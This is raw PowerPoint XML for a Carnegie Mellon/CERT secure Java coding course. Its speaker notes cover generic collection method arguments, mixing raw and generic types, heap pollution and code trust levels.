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wdp" ContentType="image/vnd.ms-photo"/>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9" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId51"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId52"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="651" r:id="rId2"/>
    <p:sldId id="652" r:id="rId3"/>
    <p:sldId id="699" r:id="rId4"/>
    <p:sldId id="654" r:id="rId5"/>
    <p:sldId id="684" r:id="rId6"/>
    <p:sldId id="685" r:id="rId7"/>
    <p:sldId id="686" r:id="rId8"/>
    <p:sldId id="687" r:id="rId9"/>
    <p:sldId id="688" r:id="rId10"/>
    <p:sldId id="689" r:id="rId11"/>
    <p:sldId id="690" r:id="rId12"/>
    <p:sldId id="691" r:id="rId13"/>
    <p:sldId id="692" r:id="rId14"/>
    <p:sldId id="698" r:id="rId15"/>
    <p:sldId id="694" r:id="rId16"/>
    <p:sldId id="695" r:id="rId17"/>
    <p:sldId id="705" r:id="rId18"/>
    <p:sldId id="707" r:id="rId19"/>
    <p:sldId id="708" r:id="rId20"/>
    <p:sldId id="709" r:id="rId21"/>
    <p:sldId id="728" r:id="rId22"/>
    <p:sldId id="713" r:id="rId23"/>
    <p:sldId id="706" r:id="rId24"/>
    <p:sldId id="731" r:id="rId25"/>
    <p:sldId id="679" r:id="rId26"/>
    <p:sldId id="680" r:id="rId27"/>
    <p:sldId id="697" r:id="rId28"/>
    <p:sldId id="681" r:id="rId29"/>
    <p:sldId id="696" r:id="rId30"/>
    <p:sldId id="683" r:id="rId31"/>
    <p:sldId id="704" r:id="rId32"/>
    <p:sldId id="715" r:id="rId33"/>
    <p:sldId id="723" r:id="rId34"/>
    <p:sldId id="717" r:id="rId35"/>
    <p:sldId id="718" r:id="rId36"/>
    <p:sldId id="719" r:id="rId37"/>
    <p:sldId id="720" r:id="rId38"/>
    <p:sldId id="721" r:id="rId39"/>
    <p:sldId id="722" r:id="rId40"/>
    <p:sldId id="700" r:id="rId41"/>
    <p:sldId id="701" r:id="rId42"/>
    <p:sldId id="702" r:id="rId43"/>
    <p:sldId id="703" r:id="rId44"/>
    <p:sldId id="724" r:id="rId45"/>
    <p:sldId id="725" r:id="rId46"/>
    <p:sldId id="726" r:id="rId47"/>
    <p:sldId id="730" r:id="rId48"/>
    <p:sldId id="729" r:id="rId49"/>
    <p:sldId id="653" r:id="rId50"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="en-US"/>
    </a:defPPr>
    <a:lvl1pPr algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック"/>
        <a:cs typeface="ＭＳ Ｐゴシック"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr marL="457200" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック"/>
        <a:cs typeface="ＭＳ Ｐゴシック"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr marL="914400" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック"/>
        <a:cs typeface="ＭＳ Ｐゴシック"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr marL="1371600" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック"/>
        <a:cs typeface="ＭＳ Ｐゴシック"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr marL="1828800" algn="l" rtl="0" fontAlgn="base">
      <a:spcBef>
        <a:spcPct val="0"/>
      </a:spcBef>
      <a:spcAft>
        <a:spcPct val="0"/>
      </a:spcAft>
      <a:defRPr sz="1000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック"/>
        <a:cs typeface="ＭＳ Ｐゴシック"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック"/>
        <a:cs typeface="ＭＳ Ｐゴシック"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr marL="2743200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック"/>
        <a:cs typeface="ＭＳ Ｐゴシック"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック"/>
        <a:cs typeface="ＭＳ Ｐゴシック"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
      <a:defRPr sz="1000" kern="1200">
        <a:solidFill>
          <a:schemeClr val="tx1"/>
        </a:solidFill>
        <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック"/>
        <a:cs typeface="ＭＳ Ｐゴシック"/>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jlallier" initials="cjl" lastIdx="1" clrIdx="0"/>
  <p:cmAuthor id="1" name="David Svoboda" initials="DS" lastIdx="4" clrIdx="1"/>
  <p:cmAuthor id="2" name="Robert C. Seacord" initials="rCs"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CC"/>
    <a:srgbClr val="FFFFCC"/>
    <a:srgbClr val="FFCCFF"/>
    <a:srgbClr val="FFFF99"/>
    <a:srgbClr val="83BCD9"/>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27744" autoAdjust="0"/>
    <p:restoredTop sz="95053" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="110" d="100"/>
          <a:sy n="110" d="100"/>
        </p:scale>
        <p:origin x="-2430" y="-78"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="2880"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="22236"/>
    </p:cViewPr>
  </p:outlineViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="100" d="100"/>
        <a:sy n="100" d="100"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:sorterViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="168" d="100"/>
        <a:sy n="168" d="100"/>
      </p:scale>
      <p:origin x="0" y="919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pitchFamily="36" charset="-128"/>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ea typeface="ＭＳ Ｐゴシック" pitchFamily="36" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{ABF56B31-F170-4A9D-BBF4-59E918C720F3}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>10/2/2014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pitchFamily="36" charset="-128"/>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atin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="36" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{A9F8468E-2E96-420C-8968-E54319934696}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9093099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35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ＭＳ Ｐゴシック" pitchFamily="36" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19353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pitchFamily="36" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="378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9354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9354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ＭＳ Ｐゴシック" pitchFamily="36" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19354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ea typeface="ＭＳ Ｐゴシック" pitchFamily="36" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{E8212886-E46C-4DA3-A5DB-E73C0AA0438E}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38934080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36" charset="-128"/>
        <a:cs typeface="ＭＳ Ｐゴシック"/>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36" charset="-128"/>
        <a:cs typeface="ＭＳ Ｐゴシック"/>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36" charset="-128"/>
        <a:cs typeface="ＭＳ Ｐゴシック"/>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36" charset="-128"/>
        <a:cs typeface="ＭＳ Ｐゴシック"/>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36" charset="-128"/>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securecoding.cert.org/confluence/display/java/MET08-J.+Preserve+the+equality+contract+when+overriding+the+equals()+method" TargetMode="External"/><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
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© 2006 Carnegie Mellon University</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>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pPr marL="226434" indent="-226434"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="226434" indent="-226434"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="226434" indent="-226434"/>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4A1F48C-0843-45D4-902A-DB65AE9B2016}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35245329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defTabSz="864931">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>The interfaces of the Java Collections Framework use generically typed, parameterized methods, such as add(E e) and put(K key, V value), to insert objects into the collection or map, but they have other methods, such as contains(), remove(), or get(), that accept an argument of type Object rather than a parameterized type. Theoretically, this enables a programmer to attempt to remove an object of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> type. The collections framework interfaces were designed in this manner to maximize backwards compatibility but can also lead to coding errors. Programmers must ensure that arguments passed to methods such as Map&lt;K,V&gt; get(), Collection&lt;E&gt;  contains(), and remove() have the same type as the parameterized type of the corresponding class instance.</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04A1F48C-0843-45D4-902A-DB65AE9B2016}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35245329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4A1F48C-0843-45D4-902A-DB65AE9B2016}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35245329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4A1F48C-0843-45D4-902A-DB65AE9B2016}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35245329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4A1F48C-0843-45D4-902A-DB65AE9B2016}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35245329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effectLst/>
              </a:rPr>
              <a:t>The collections framework equals() method also takes an argument of type Object, but it is acceptable to pass an object of a different type from that of the underlying collection/map to the equals() method. Doing so cannot cause any confusion because the contract of the equals() method stipulates that objects of different classes will never be equivalent. See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>MET08-J. Preserve the equality contract when overriding the equals() method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> for more information.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{04A1F48C-0843-45D4-902A-DB65AE9B2016}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35245329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8757D8-AE17-4FE0-AF3E-CA8DB6030568}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6223439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book, this rule is: “Don’t mix generic types with raw types”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We changed it on the wiki due to excessive false positives in our security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> audits.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Mixing raw &amp; generic types is OK as long as you don’t pollute the heap.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{38980EEF-6EC0-43CE-94E1-43366B040A39}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26925932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4A1F48C-0843-45D4-902A-DB65AE9B2016}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35245329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Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="36" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>a variable is not guaranteed to always refer to a subtype of its declared type, but</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="36" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>only to subclasses or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="36" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>subinterfaces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="36" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> of the declared type. This is due to the possibility of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="36" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>heap pollution discussed below.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{04A1F48C-0843-45D4-902A-DB65AE9B2016}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3524532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8757D8-AE17-4FE0-AF3E-CA8DB6030568}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6223439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4A1F48C-0843-45D4-902A-DB65AE9B2016}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35245329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4A1F48C-0843-45D4-902A-DB65AE9B2016}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35245329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4A1F48C-0843-45D4-902A-DB65AE9B2016}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35245329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b="1" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>RUN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>PollutionArrayExample</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{38980EEF-6EC0-43CE-94E1-43366B040A39}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28128227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8757D8-AE17-4FE0-AF3E-CA8DB6030568}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6223439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should or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> must the trust levels be? [click for each, &amp; discuss]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Note that trust is relative — one piece of locally-developed code may trust itself, but distrust another piece of locally-developed code (and vice versa).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
